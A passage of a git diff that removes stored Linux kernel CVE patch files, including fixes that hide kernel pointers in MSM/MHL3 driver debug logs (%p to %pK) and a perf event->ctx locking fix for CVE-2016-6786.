--		pr_debug("ihdl=%p buf=0x%pa len=0x%lx\n",
-+		pr_debug("ihdl=%pK buf=0x%pa len=0x%lx\n",
- 			 data->srcp_dma_buf, &data->addr, data->len);
- 	} else {
- 		mdss_mdp_put_img(data, rotator, dir);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_wb.c b/drivers/video/msm/mdss/mdss_mdp_wb.c
-index c9b6945..993b8d6 100644
---- a/drivers/video/msm/mdss/mdss_mdp_wb.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_wb.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -95,7 +95,7 @@ struct mdss_mdp_data *mdss_mdp_wb_debug_buffer(struct msm_fb_data_type *mfd)
- 		ihdl = ion_alloc(iclient, img_size, SZ_4K,
- 				 ION_HEAP(ION_SF_HEAP_ID), 0);
- 		if (IS_ERR_OR_NULL(ihdl)) {
--			pr_err("unable to alloc fbmem from ion (%p)\n", ihdl);
-+			pr_err("unable to alloc fbmem from ion (%pK)\n", ihdl);
- 			return NULL;
- 		}
- 
-@@ -122,7 +122,7 @@ struct mdss_mdp_data *mdss_mdp_wb_debug_buffer(struct msm_fb_data_type *mfd)
- 			img->len = img_size;
- 		}
- 
--		pr_debug("ihdl=%p virt=%p phys=0x%pa iova=0x%pa size=%u\n",
-+		pr_debug("ihdl=%pK virt=%pK phys=0x%pa iova=0x%pa size=%u\n",
- 			 ihdl, videomemory, &mdss_wb_mem, &img->addr, img_size);
- 	}
- 	return &mdss_wb_buffer;
-@@ -437,7 +437,7 @@ static struct mdss_mdp_wb_data *get_user_node(struct msm_fb_data_type *mfd,
- 		list_for_each_entry(node, &wb->register_queue, registered_entry)
- 			if ((node->buf_data.p[0].srcp_ihdl == ihdl) &&
- 				    (node->buf_info.offset == data->offset)) {
--				pr_debug("found fd=%d hdl=%p off=%x addr=%pa\n",
-+				pr_debug("found fd=%d hdl=%pK off=%x addr=%pa\n",
- 						data->memory_id, ihdl,
- 						data->offset,
- 						&node->buf_data.p[0].addr);
-@@ -513,7 +513,7 @@ static void mdss_mdp_wb_free_node(struct mdss_mdp_wb_data *node)
- 	if (node->user_alloc) {
- 		buf = &node->buf_data.p[0];
- 
--		pr_debug("free user mem_id=%d ihdl=%p, offset=%u addr=0x%pa\n",
-+		pr_debug("free user mem_id=%d ihdl=%pK, offset=%u addr=0x%pa\n",
- 				node->buf_info.memory_id,
- 				buf->srcp_ihdl,
- 				node->buf_info.offset,
-diff --git a/drivers/video/msm/mdss/mdss_util.c b/drivers/video/msm/mdss/mdss_util.c
-index 3a9ff9b..2f9dd44 100644
---- a/drivers/video/msm/mdss/mdss_util.c
-+++ b/drivers/video/msm/mdss/mdss_util.c
-@@ -33,7 +33,7 @@ int mdss_register_irq(struct mdss_hw *hw)
- 	if (!mdss_irq_handlers[hw->hw_ndx])
- 		mdss_irq_handlers[hw->hw_ndx] = hw;
- 	else
--		pr_err("panel %d's irq at %p is already registered\n",
-+		pr_err("panel %d's irq at %pK is already registered\n",
- 			hw->hw_ndx, hw->irq_handler);
- 	spin_unlock_irqrestore(&mdss_lock, irq_flags);
- 
-diff --git a/drivers/video/msm/mdss/mhl3/mhl_linux_tx.c b/drivers/video/msm/mdss/mhl3/mhl_linux_tx.c
-index 1514f02..d3dc874 100644
---- a/drivers/video/msm/mdss/mhl3/mhl_linux_tx.c
-+++ b/drivers/video/msm/mdss/mhl3/mhl_linux_tx.c
-@@ -1,7 +1,7 @@
- /*
-  * SiI8620 Linux Driver
-  *
-- * Copyright (C) 2013-2014 Silicon Image, Inc.
-+ * Copyright (C) 2013-2014, 2016 Silicon Image, Inc.
-  *
-  * This program is free software; you can redistribute it and/or
-  * modify it under the terms of the GNU General Public License as
-@@ -5599,7 +5599,7 @@ static int is_timer_handle_valid(struct mhl_dev_context *dev_context,
- 	}
- 
- 	if (timer != timer_handle) {
--		MHL_TX_DBG_WARN("Invalid timer handle %p received\n",
-+		MHL_TX_DBG_WARN("Invalid timer handle %pK received\n",
- 				timer_handle);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/video/msm/mdss/mhl3/mhl_supp.c b/drivers/video/msm/mdss/mhl3/mhl_supp.c
-index 7055d8c..de0e207 100644
---- a/drivers/video/msm/mdss/mhl3/mhl_supp.c
-+++ b/drivers/video/msm/mdss/mhl3/mhl_supp.c
-@@ -1,7 +1,7 @@
- /*
-  * SiI8620 Linux Driver
-  *
-- * Copyright (C) 2013-2014 Silicon Image, Inc.
-+ * Copyright (C) 2013-2014, 2016 Silicon Image, Inc.
-  *
-  * This program is free software; you can redistribute it and/or
-  * modify it under the terms of the GNU General Public License as
-@@ -185,7 +185,7 @@ static struct cbus_req *get_free_cbus_queue_entry_impl(
- 	req->function = function;
- 	req->line = line;
- 	req->sequence = dev_context->sequence++;
--	/*MHL_TX_DBG_ERR(,"q %d get:0x%p %s:%d\n",
-+	/*MHL_TX_DBG_ERR(,"q %d get:0x%pK %s:%d\n",
- 		req->sequence,req,function,line); */
- 	return req;
- }
-@@ -197,7 +197,7 @@ static void return_cbus_queue_entry_impl(struct mhl_dev_context *dev_context,
- 					 struct cbus_req *pReq,
- 					 const char *function, int line)
- {
--	/* MHL_TX_DBG_ERR(,"q ret:0x%p %s:%d\n",pReq,function,line); */
-+	/* MHL_TX_DBG_ERR(,"q ret:0x%pK %s:%d\n",pReq,function,line); */
- 	list_add(&pReq->link, &dev_context->cbus_free_list);
- 
- }
-@@ -372,7 +372,7 @@ static struct block_req *start_new_block_marshalling_req_impl(
- 	    sizeof(payload->as_bytes) -
- 	    sizeof(struct SI_PACK_THIS_STRUCT standard_transport_header_t);
- 	dev_context->block_protocol.marshalling_req = req;
--	MHL_TX_DBG_WARN("q %d get:0x%p %s:%d\n", req->sequence, req, function,
-+	MHL_TX_DBG_WARN("q %d get:0x%pK %s:%d\n", req->sequence, req, function,
- 			line);
- 	return req;
- }
-@@ -384,7 +384,7 @@ static void return_block_queue_entry_impl(struct mhl_dev_context *dev_context,
- 					  struct block_req *pReq,
- 					  const char *function, int line)
- {
--	/* MHL_TX_DBG_ERR(,"q ret:0x%p %s:%d\n",pReq,function,line); */
-+	/* MHL_TX_DBG_ERR(,"q ret:0x%pK %s:%d\n",pReq,function,line); */
- 	list_add(&pReq->link, &dev_context->block_protocol.free_list);
- 
- }
-@@ -1283,7 +1283,7 @@ void si_mhl_tx_drive_states(struct mhl_dev_context *dev_context)
- 	if (req == NULL)
- 		return;
- 
--	MHL_TX_DBG_INFO("req: %p\n", req);
-+	MHL_TX_DBG_INFO("req: %pK\n", req);
- 	/* coordinate write burst requests and grants. */
- 	if (MHL_MSC_MSG == req->command) {
- 		dev_context->msc_msg_last_data = req->msg_data[1];
-@@ -1298,7 +1298,7 @@ void si_mhl_tx_drive_states(struct mhl_dev_context *dev_context)
- 		}
- 	}
- 
--	MHL_TX_DBG_INFO("req: %p\n", req);
-+	MHL_TX_DBG_INFO("req: %pK\n", req);
- 	if (req) {
- 		uint8_t ret_val;
- 		dev_context->current_cbus_req = req;
-diff --git a/drivers/video/msm/mdss/mhl3/platform.c b/drivers/video/msm/mdss/mhl3/platform.c
-index c0e5174..16ce64e 100644
---- a/drivers/video/msm/mdss/mhl3/platform.c
-+++ b/drivers/video/msm/mdss/mhl3/platform.c
-@@ -1,7 +1,7 @@
- /*
-  * SiI8620 Linux Driver
-  *
-- * Copyright (C) 2013-2014 Silicon Image, Inc.
-+ * Copyright (C) 2013-2014, 2016 Silicon Image, Inc.
-  *
-  * This program is free software; you can redistribute it and/or
-  * modify it under the terms of the GNU General Public License as
-@@ -1590,7 +1590,7 @@ static int __devinit si_8620_mhl_tx_i2c_probe(struct i2c_client *client,
- {
- 	int ret;
- 
--	pr_info("%s(), i2c_device_id = %p\n", __func__, id);
-+	pr_info("%s(), i2c_device_id = %pK\n", __func__, id);
- 
- #if defined(SIMG_USE_DTS)
- 	/*
-@@ -1844,7 +1844,7 @@ static int __devinit si_8620_mhl_tx_spi_probe(struct spi_device *spi)
- {
- 	int ret;
- 
--	pr_info("%s(), spi = %p\n", __func__, spi);
-+	pr_info("%s(), spi = %pK\n", __func__, spi);
- 	spi->bits_per_word = 8;
- 	spi_dev = spi;
- 	spi_bus_num = spi->master->bus_num;
-@@ -2161,7 +2161,7 @@ static void __exit si_8620_exit(void)
- 		for (idx = 0; idx < ARRAY_SIZE(device_addresses); idx++) {
- 			MHL_TX_DBG_INFO("\n");
- 			if (device_addresses[idx].client != NULL) {
--				MHL_TX_DBG_INFO("unregistering device:%p\n",
-+				MHL_TX_DBG_INFO("unregistering device:%pK\n",
- 						device_addresses[idx].client);
- 				i2c_unregister_device(device_addresses[idx].
- 						      client);
-diff --git a/drivers/video/msm/mdss/mhl3/si_8620_drv.c b/drivers/video/msm/mdss/mhl3/si_8620_drv.c
-index dd71f1b..9d68f28 100644
---- a/drivers/video/msm/mdss/mhl3/si_8620_drv.c
-+++ b/drivers/video/msm/mdss/mhl3/si_8620_drv.c
-@@ -2367,7 +2367,7 @@ int si_mhl_tx_drv_get_edid_fifo_partial_block(struct drv_hw_context *hw_context,
- 	offset = EDID_BLOCK_SIZE * (hw_context->edid_fifo_block_number & 0x01);
- 	offset += start;
- 
--	MHL_TX_DBG_INFO("%p %p\n", hw_context, edid_buf);
-+	MHL_TX_DBG_INFO("%pK %pK\n", hw_context, edid_buf);
- 	if (EDID_BLOCK_SIZE == (offset + length))
- 		hw_context->edid_fifo_block_number++;
- 
-@@ -2401,7 +2401,7 @@ int si_mhl_tx_drv_get_edid_fifo_next_block(struct drv_hw_context *hw_context,
- 
- 	offset = EDID_BLOCK_SIZE * (hw_context->edid_fifo_block_number & 0x01);
- 
--	MHL_TX_DBG_INFO("%p %p\n", hw_context, edid_buf);
-+	MHL_TX_DBG_INFO("%pK %pK\n", hw_context, edid_buf);
- 	hw_context->edid_fifo_block_number++;
- 
- #ifdef MANUAL_EDID_FETCH
-diff --git a/drivers/video/msm/mdss/mhl3/si_emsc_hid.c b/drivers/video/msm/mdss/mhl3/si_emsc_hid.c
-index 17d33c9..52acb26 100644
---- a/drivers/video/msm/mdss/mhl3/si_emsc_hid.c
-+++ b/drivers/video/msm/mdss/mhl3/si_emsc_hid.c
-@@ -1,8 +1,8 @@
- /*
-  * MHL3 HID Tunneling implementation
-  *
-- * Copyright (c) 2013-2014 Lee Mulcahy <william.mulcahy@siliconimage.com>
-- * Copyright (c) 2013-2014 Silicon Image, Inc
-+ * Copyright (c) 2013-2014, 2016 Lee Mulcahy <william.mulcahy@siliconimage.com>
-+ * Copyright (c) 2013-2014, 2016 Silicon Image, Inc
-  *
-  * This program is free software; you can redistribute it and/or
-  * modify it under the terms of the GNU General Public License as
-@@ -461,7 +461,7 @@ static int mhl3_send_ack(struct mhl3_hid_data *mhid, uint8_t reason)
- 		return -ENODEV;
- 
- 	MHL3_HID_DBG_WARN("%s - HID_ACK reason code: %02X\n", __func__, reason);
--	MHL3_HID_DBG_ERR("mhid->mdev: %p\n", mhid->mdev);
-+	MHL3_HID_DBG_ERR("mhid->mdev: %pK\n", mhid->mdev);
- 	mhid->out_data[0] = MHL3_HID_ACK;
- 	mhid->out_data[1] = reason;
- 
-@@ -1089,7 +1089,7 @@ mhid_cleanup:
- 	mhl3_send_ack(mhid, HID_ACK_NODEV);
- 
- 	mhid->flags |= HID_FLAGS_WQ_CANCEL;
--	MHL3_HID_DBG_ERR("WORK QUEUE function FAIL - mhid: %p\n", mhid);
-+	MHL3_HID_DBG_ERR("WORK QUEUE function FAIL - mhid: %pK\n", mhid);
- 	mhl3_disconnect_and_destroy_hid_device(mhid);
- 
- 	/*
-diff --git a/drivers/video/msm/mdss/mhl3/si_mdt_inputdev.c b/drivers/video/msm/mdss/mhl3/si_mdt_inputdev.c
-index 13d2a08..573684a1 100644
---- a/drivers/video/msm/mdss/mhl3/si_mdt_inputdev.c
-+++ b/drivers/video/msm/mdss/mhl3/si_mdt_inputdev.c
-@@ -1,7 +1,7 @@
- /*
-  * SiI8620 Linux Driver
-  *
-- * Copyright (C) 2013-2014 Silicon Image, Inc.
-+ * Copyright (C) 2013-2014, 2016 Silicon Image, Inc.
-  *
-  * This program is free software; you can redistribute it and/or
-  * modify it under the terms of the GNU General Public License as
-@@ -80,10 +80,11 @@ static void destroy_mouse(struct mhl_dev_context *dev_context)
- 	if (dev_context->mdt_devs.dev_mouse == NULL)
- 		return;
- 
--	MHL_TX_DBG_INFO("Unregistering mouse: %p\n",
-+	MHL_TX_DBG_INFO("Unregistering mouse: %pK\n",
- 			dev_context->mdt_devs.dev_mouse);
- 	input_unregister_device(dev_context->mdt_devs.dev_mouse);
--	MHL_TX_DBG_INFO("Freeing mouse: %p\n", dev_context->mdt_devs.dev_mouse);
-+	MHL_TX_DBG_INFO("Freeing mouse: %pK\n",
-+			 dev_context->mdt_devs.dev_mouse);
- 	input_free_device(dev_context->mdt_devs.dev_mouse);
- 	dev_context->mdt_devs.dev_mouse = NULL;
- }
-@@ -93,10 +94,10 @@ static void destroy_keyboard(struct mhl_dev_context *dev_context)
- 	if (dev_context->mdt_devs.dev_keyboard == NULL)
- 		return;
- 
--	MHL_TX_DBG_INFO("Unregistering keyboard: %p\n",
-+	MHL_TX_DBG_INFO("Unregistering keyboard: %pK\n",
- 			dev_context->mdt_devs.dev_keyboard);
- 	input_unregister_device(dev_context->mdt_devs.dev_keyboard);
--	MHL_TX_DBG_INFO("Freeing keyboard: %p\n",
-+	MHL_TX_DBG_INFO("Freeing keyboard: %pK\n",
- 			dev_context->mdt_devs.dev_keyboard);
- 	input_free_device(dev_context->mdt_devs.dev_keyboard);
- 	dev_context->mdt_devs.dev_keyboard = NULL;
-@@ -107,10 +108,10 @@ static void destroy_touchscreen(struct mhl_dev_context *dev_context)
- 	if (dev_context->mdt_devs.dev_touchscreen == NULL)
- 		return;
- 
--	MHL_TX_DBG_INFO("Unregistering mouse: %p\n",
-+	MHL_TX_DBG_INFO("Unregistering mouse: %pK\n",
- 			dev_context->mdt_devs.dev_touchscreen);
- 	input_unregister_device(dev_context->mdt_devs.dev_touchscreen);
--	MHL_TX_DBG_INFO("Freeing mouse: %p\n",
-+	MHL_TX_DBG_INFO("Freeing mouse: %pK\n",
- 			dev_context->mdt_devs.dev_touchscreen);
- 	input_free_device(dev_context->mdt_devs.dev_touchscreen);
- 	dev_context->mdt_devs.dev_touchscreen = NULL;
-@@ -130,7 +131,7 @@ int init_mdt_keyboard(struct mhl_dev_context *dev_context)
- 		MHL_TX_DBG_ERR("Not enough memory\n");
- 		return -ENOMEM;
- 	}
--	MHL_TX_DBG_INFO("Allocated keyboard: %p\n", dev_keyboard);
-+	MHL_TX_DBG_INFO("Allocated keyboard: %pK\n", dev_keyboard);
- 
- 	set_bit(EV_KEY, dev_keyboard->evbit);
- 	set_bit(EV_REP, dev_keyboard->evbit);
-@@ -158,7 +159,7 @@ int init_mdt_keyboard(struct mhl_dev_context *dev_context)
- 		return error;
- 	}
- 
--	MHL_TX_DBG_INFO("Registered keyboard: %p\n", dev_keyboard);
-+	MHL_TX_DBG_INFO("Registered keyboard: %pK\n", dev_keyboard);
- 
- 	dev_context->mdt_devs.dev_keyboard = dev_keyboard;
- 
-@@ -175,7 +176,7 @@ int init_mdt_mouse(struct mhl_dev_context *dev_context)
- 		MHL_TX_DBG_ERR("Not enough memory\n");
- 		return -ENOMEM;
- 	}
--	MHL_TX_DBG_INFO("Allocated mouse: %p\n", dev_mouse);
-+	MHL_TX_DBG_INFO("Allocated mouse: %pK\n", dev_mouse);
- 
- 	set_bit(EV_REL, dev_mouse->evbit);
- 	set_bit(EV_KEY, dev_mouse->evbit);
-@@ -208,7 +209,7 @@ int init_mdt_mouse(struct mhl_dev_context *dev_context)
- 		return error;
- 	}
- 
--	MHL_TX_DBG_INFO("Registered mouse: %p\n", dev_mouse);
-+	MHL_TX_DBG_INFO("Registered mouse: %pK\n", dev_mouse);
- 
- 	dev_context->mdt_devs.dev_mouse = dev_mouse;
- 
-@@ -226,7 +227,7 @@ int init_mdt_touchscreen(struct mhl_dev_context *dev_context)
- 		return -ENOMEM;
- 	}
- 
--	MHL_TX_DBG_INFO("Allocated touch screen: %p\n", dev_touchscreen);
-+	MHL_TX_DBG_INFO("Allocated touch screen: %pK\n", dev_touchscreen);
- 
- #if !defined(SINGLE_TOUCH) && defined(KERNEL_2_6_38_AND_LATER)
- 	input_mt_init_slots(dev_touchscreen, MAX_TOUCH_CONTACTS);
-@@ -301,7 +302,7 @@ int init_mdt_touchscreen(struct mhl_dev_context *dev_context)
- 		input_free_device(dev_touchscreen);
- 		return error;
- 	}
--	MHL_TX_DBG_INFO("Registered touchscreen: %p\n", dev_touchscreen);
-+	MHL_TX_DBG_INFO("Registered touchscreen: %pK\n", dev_touchscreen);
- 
- 	dev_context->mdt_devs.dev_touchscreen = dev_touchscreen;
- 
-diff --git a/drivers/video/msm/mdss/mhl3/si_mhl2_edid_3d.c b/drivers/video/msm/mdss/mhl3/si_mhl2_edid_3d.c
-index fd6918f..0e7a35c 100644
---- a/drivers/video/msm/mdss/mhl3/si_mhl2_edid_3d.c
-+++ b/drivers/video/msm/mdss/mhl3/si_mhl2_edid_3d.c
-@@ -1,7 +1,7 @@
- /*
-  * SiI8620 Linux Driver
-  *
-- * Copyright (C) 2013-2014 Silicon Image, Inc.
-+ * Copyright (C) 2013-2014, 2016 Silicon Image, Inc.
-  *
-  * This program is free software; you can redistribute it and/or
-  * modify it under the terms of the GNU General Public License as
-@@ -1118,7 +1118,7 @@ static void tx_prune_dtd_list(struct edid_3d_data_t *mhl_edid_3d_data,
- 			if ((0 != p_desc->dtd.pixel_clock_low) ||
- 				(0 != p_desc->dtd.pixel_clock_high)) {
- 				MHL_TX_EDID_INFO(
--					"pix clock non-zero p_desc:%p", p_desc)
-+					"pix clock non-zero p_desc:%pK", p_desc)
- 				if ((0 == p_desc->dtd.horz_active_7_0) &&
- 				    (0 == p_desc->dtd.horz_active_blanking_high.
- 					horz_active_11_8)) {
-@@ -1133,7 +1133,7 @@ static void tx_prune_dtd_list(struct edid_3d_data_t *mhl_edid_3d_data,
- 						 * one by one
- 						 */
- 						MHL_TX_EDID_INFO(
--						"p_desc:%p p_next_desc:%p\n",
-+						"p_desc:%pK p_next_desc:%pK\n",
- 						p_desc, p_next_desc)
- 						*p_desc++ = *p_next_desc++;
- 					}
-@@ -1144,7 +1144,7 @@ static void tx_prune_dtd_list(struct edid_3d_data_t *mhl_edid_3d_data,
- 					p_desc = p_holder;
- 				} else {
- 					p_desc++;
--					MHL_TX_EDID_INFO("p_desc:%p\n", p_desc)
-+					MHL_TX_EDID_INFO("p_desc:%pK\n", p_desc)
- 				}
- 			}
- 		}
-@@ -1446,7 +1446,7 @@ static bool si_mhl_tx_parse_detailed_timing_descriptor(
- 			 * Mark this mode for pruning by setting
- 			 * horizontal active to zero
- 			 */
--			MHL_TX_DBG_ERR("%smark for pruning%s %p\n",
-+			MHL_TX_DBG_ERR("%smark for pruning%s %pK\n",
- 				ANSI_ESC_YELLOW_TEXT,
- 				ANSI_ESC_RESET_TEXT,
- 				p_desc);
-@@ -1500,7 +1500,7 @@ static uint8_t si_mhl_tx_parse_861_long_descriptors(
- 				++mhl_edid_3d_data->parse_data.
- 				    num_cea_861_timing_dtds;
- 			} else if (valid) {
--				MHL_TX_EDID_INFO("stopping at %p\n",
-+				MHL_TX_EDID_INFO("stopping at %pK\n",
- 					p_data_u.p_long_descriptors)
- 				break;
- 			}
-@@ -1600,7 +1600,7 @@ static void prune_hdmi_vsdb_vic_list(
- 		HDMI_VIC_len = inner_loop_limit;
- 	p_CEA_extension->byte_offset_to_18_byte_descriptors -=
- 	    num_HDMI_VICs_pruned;
--	MHL_TX_EDID_INFO("%p\n", mhl_edid_3d_data->parse_data.p_HDMI_vsdb);
-+	MHL_TX_EDID_INFO("%pK\n", mhl_edid_3d_data->parse_data.p_HDMI_vsdb);
- 	if (mhl_edid_3d_data->parse_data.p_HDMI_vsdb) {
- 		mhl_edid_3d_data->parse_data.p_HDMI_vsdb->
- 		    header.fields.length_following_header -=
-@@ -1722,8 +1722,7 @@ static void prune_svd_list(
- 					   ("\n\nInvalid extension size\n\n"));
- 				while (pb_src < pb_limit) {
- 					MHL_TX_EDID_INFO(
--					    "moving data up %p(0x%02X) "
--					    "<- %p(0x%02X)\n",
-+					    "moving data up %pK(0x%02X)<- %pK(0x%02X)\n",
- 					    pb_dest, (uint16_t)*pb_dest,
- 					    pb_src, (uint16_t)*pb_src);
- 					*pb_dest++ = *pb_src++;
-@@ -3123,7 +3122,7 @@ void si_mhl_tx_process_hev_vic_burst(struct edid_3d_data_t *mhl_edid_3d_data,
- 				     ANSI_ESC_RED_TEXT, ANSI_ESC_RESET_TEXT);
- 				return;
- 			} else {
--				MHL_TX_DBG_WARN(" %d %p\n", hev_index,
-+				MHL_TX_DBG_WARN(" %d %pK\n", hev_index,
- 					mhl_edid_3d_data->hev_vic_list)
- 				mhl_edid_3d_data->hev_vic_info.
- 				    num_items_allocated =
-@@ -3136,7 +3135,7 @@ void si_mhl_tx_process_hev_vic_burst(struct edid_3d_data_t *mhl_edid_3d_data,
- 		MHL_TX_DBG_ERR("bogus write burst, no hev_vic_list\n")
- 		return;
- 	}
--	MHL_TX_DBG_WARN(" %d %p\n", hev_index, mhl_edid_3d_data->hev_vic_list)
-+	MHL_TX_DBG_WARN(" %d %pK\n", hev_index, mhl_edid_3d_data->hev_vic_list)
- 	if (NULL == mhl_edid_3d_data->hev_vic_list) {
- 		MHL_TX_DBG_ERR("%s no place to put HEV_VIC burst%s\n",
- 			       ANSI_ESC_RED_TEXT, ANSI_ESC_RESET_TEXT);
-@@ -3155,7 +3154,7 @@ void si_mhl_tx_process_hev_vic_burst(struct edid_3d_data_t *mhl_edid_3d_data,
- 		     burst_id_HEV_VIC,
- 		     (union video_burst_descriptor_u *) &p_burst->
- 		     video_descriptors[i])) {
--			MHL_TX_DBG_INFO(" %d %p\n",
-+			MHL_TX_DBG_INFO(" %d %pK\n",
- 				hev_index, mhl_edid_3d_data->hev_vic_list)
- 			mhl_edid_3d_data->hev_vic_list[hev_index].
- 			    mhl3_hev_vic_descriptor =
-@@ -4036,7 +4035,7 @@ static uint8_t parse_861_block(struct edid_3d_data_t *mhl_edid_3d_data,
- 
- 	mhl_edid_3d_data->parse_data.p_HDMI_vsdb = NULL;
- 
--	MHL_TX_EDID_INFO("tag:place holder EDID block:%p\n", p_EDID_block_data);
-+	MHL_TX_EDID_INFO("tag:place holdr EDID block:%pK\n", p_EDID_block_data);
- 	if (EDID_EXTENSION_BLOCK_MAP == p_CEA_extension->tag) {
- 		struct block_map_t *p_block_map;
- 		int i;
-@@ -4123,7 +4122,7 @@ void si_mhl_tx_handle_atomic_hw_edid_read_complete(
- 		     mhl_edid_3d_data->parse_data.num_EDID_extensions;
- 		     ++counter) {
- 			MHL_TX_EDID_INFO
--			    (" counter:%d tag:place holder EDID block:%p\n",
-+			    (" counter:%d tag:place holder EDID block:%pK\n",
- 			     counter,
- 			     &mhl_edid_3d_data->
- 			     EDID_block_data[EDID_BLOCK_SIZE * counter]);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6786/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6786/ANY/0001.patch
deleted file mode 100644
index 280b6064..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6786/ANY/0001.patch
+++ /dev/null
@@ -1,505 +0,0 @@
-From f63a8daa5812afef4f06c962351687e1ff9ccb2b Mon Sep 17 00:00:00 2001
-From: Peter Zijlstra <peterz@infradead.org>
-Date: Fri, 23 Jan 2015 12:24:14 +0100
-Subject: perf: Fix event->ctx locking
-
-There have been a few reported issues wrt. the lack of locking around
-changing event->ctx. This patch tries to address those.
-
-It avoids the whole rwsem thing; and while it appears to work, please
-give it some thought in review.
-
-What I did fail at is sensible runtime checks on the use of
-event->ctx, the RCU use makes it very hard.
-
-Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
-Cc: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
-Cc: Jiri Olsa <jolsa@redhat.com>
-Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Link: http://lkml.kernel.org/r/20150123125834.209535886@infradead.org
-Signed-off-by: Ingo Molnar <mingo@kernel.org>
----
- kernel/events/core.c | 244 +++++++++++++++++++++++++++++++++++++++++++--------
- 1 file changed, 207 insertions(+), 37 deletions(-)
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index b358cb3..417a96b 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -907,6 +907,77 @@ static void put_ctx(struct perf_event_context *ctx)
- }
- 
- /*
-+ * Because of perf_event::ctx migration in sys_perf_event_open::move_group and
-+ * perf_pmu_migrate_context() we need some magic.
-+ *
-+ * Those places that change perf_event::ctx will hold both
-+ * perf_event_ctx::mutex of the 'old' and 'new' ctx value.
-+ *
-+ * Lock ordering is by mutex address. There is one other site where
-+ * perf_event_context::mutex nests and that is put_event(). But remember that
-+ * that is a parent<->child context relation, and migration does not affect
-+ * children, therefore these two orderings should not interact.
-+ *
-+ * The change in perf_event::ctx does not affect children (as claimed above)
-+ * because the sys_perf_event_open() case will install a new event and break
-+ * the ctx parent<->child relation, and perf_pmu_migrate_context() is only
-+ * concerned with cpuctx and that doesn't have children.
-+ *
-+ * The places that change perf_event::ctx will issue:
-+ *
-+ *   perf_remove_from_context();
-+ *   synchronize_rcu();
-+ *   perf_install_in_context();
-+ *
-+ * to affect the change. The remove_from_context() + synchronize_rcu() should
-+ * quiesce the event, after which we can install it in the new location. This
-+ * means that only external vectors (perf_fops, prctl) can perturb the event
-+ * while in transit. Therefore all such accessors should also acquire
-+ * perf_event_context::mutex to serialize against this.
-+ *
-+ * However; because event->ctx can change while we're waiting to acquire
-+ * ctx->mutex we must be careful and use the below perf_event_ctx_lock()
-+ * function.
-+ *
-+ * Lock order:
-+ *	task_struct::perf_event_mutex
-+ *	  perf_event_context::mutex
-+ *	    perf_event_context::lock
-+ *	    perf_event::child_mutex;
-+ *	    perf_event::mmap_mutex
-+ *	    mmap_sem
-+ */
-+static struct perf_event_context *perf_event_ctx_lock(struct perf_event *event)
-+{
-+	struct perf_event_context *ctx;
-+
-+again:
-+	rcu_read_lock();
-+	ctx = ACCESS_ONCE(event->ctx);
-+	if (!atomic_inc_not_zero(&ctx->refcount)) {
-+		rcu_read_unlock();
-+		goto again;
-+	}
-+	rcu_read_unlock();
-+
-+	mutex_lock(&ctx->mutex);
-+	if (event->ctx != ctx) {
-+		mutex_unlock(&ctx->mutex);
-+		put_ctx(ctx);
-+		goto again;
-+	}
-+
-+	return ctx;
-+}
-+
-+static void perf_event_ctx_unlock(struct perf_event *event,
-+				  struct perf_event_context *ctx)
-+{
-+	mutex_unlock(&ctx->mutex);
-+	put_ctx(ctx);
-+}
-+
-+/*
-  * This must be done under the ctx->lock, such as to serialize against
-  * context_equiv(), therefore we cannot call put_ctx() since that might end up
-  * calling scheduler related locks and ctx->lock nests inside those.
-@@ -1666,7 +1737,7 @@ int __perf_event_disable(void *info)
-  * is the current context on this CPU and preemption is disabled,
-  * hence we can't get into perf_event_task_sched_out for this context.
-  */
--void perf_event_disable(struct perf_event *event)
-+static void _perf_event_disable(struct perf_event *event)
- {
- 	struct perf_event_context *ctx = event->ctx;
- 	struct task_struct *task = ctx->task;
-@@ -1707,6 +1778,19 @@ retry:
- 	}
- 	raw_spin_unlock_irq(&ctx->lock);
- }
-+
-+/*
-+ * Strictly speaking kernel users cannot create groups and therefore this
-+ * interface does not need the perf_event_ctx_lock() magic.
-+ */
-+void perf_event_disable(struct perf_event *event)
-+{
-+	struct perf_event_context *ctx;
-+
-+	ctx = perf_event_ctx_lock(event);
-+	_perf_event_disable(event);
-+	perf_event_ctx_unlock(event, ctx);
-+}
- EXPORT_SYMBOL_GPL(perf_event_disable);
- 
- static void perf_set_shadow_time(struct perf_event *event,
-@@ -2170,7 +2254,7 @@ unlock:
-  * perf_event_for_each_child or perf_event_for_each as described
-  * for perf_event_disable.
-  */
--void perf_event_enable(struct perf_event *event)
-+static void _perf_event_enable(struct perf_event *event)
- {
- 	struct perf_event_context *ctx = event->ctx;
- 	struct task_struct *task = ctx->task;
-@@ -2226,9 +2310,21 @@ retry:
- out:
- 	raw_spin_unlock_irq(&ctx->lock);
- }
-+
-+/*
-+ * See perf_event_disable();
-+ */
-+void perf_event_enable(struct perf_event *event)
-+{
-+	struct perf_event_context *ctx;
-+
-+	ctx = perf_event_ctx_lock(event);
-+	_perf_event_enable(event);
-+	perf_event_ctx_unlock(event, ctx);
-+}
- EXPORT_SYMBOL_GPL(perf_event_enable);
- 
--int perf_event_refresh(struct perf_event *event, int refresh)
-+static int _perf_event_refresh(struct perf_event *event, int refresh)
- {
- 	/*
- 	 * not supported on inherited events
-@@ -2237,10 +2333,25 @@ int perf_event_refresh(struct perf_event *event, int refresh)
- 		return -EINVAL;
- 
- 	atomic_add(refresh, &event->event_limit);
--	perf_event_enable(event);
-+	_perf_event_enable(event);
- 
- 	return 0;
- }
-+
-+/*
-+ * See perf_event_disable()
-+ */
-+int perf_event_refresh(struct perf_event *event, int refresh)
-+{
-+	struct perf_event_context *ctx;
-+	int ret;
-+
-+	ctx = perf_event_ctx_lock(event);
-+	ret = _perf_event_refresh(event, refresh);
-+	perf_event_ctx_unlock(event, ctx);
-+
